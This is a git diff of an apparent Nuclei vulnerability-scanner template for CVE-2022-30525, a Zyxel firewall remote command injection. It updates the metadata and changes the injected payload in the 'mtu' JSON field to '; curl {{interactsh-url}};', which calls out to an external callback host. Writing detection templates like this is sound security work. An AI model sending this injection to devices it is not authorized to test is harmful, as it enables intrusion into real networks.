diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml index 9c9d520a17..359020a92e 100644 --- a/cves/2022/CVE-2022-30525.yaml +++ b/cves/2022/CVE-2022-30525.yaml @@ -1,13 +1,16 @@ id: CVE-2022-30525 info: - name: Zyxel Firewall Unauthenticated RCE - author: h1ei1 + name: Zyxel Firewall - Unauthenticated RCE + author: h1ei1,prajiteshsingh severity: critical - description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on . + description: | + The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on. reference: - - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - tags: rce,Zyxel,cve,cve2022 + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + tags: rce,zyxel,cve,cve2022,firewall,unauth requests: - raw: @@ -16,10 +19,15 @@ requests: Host: {{Hostname}} Content-Type: application/json - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"} + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500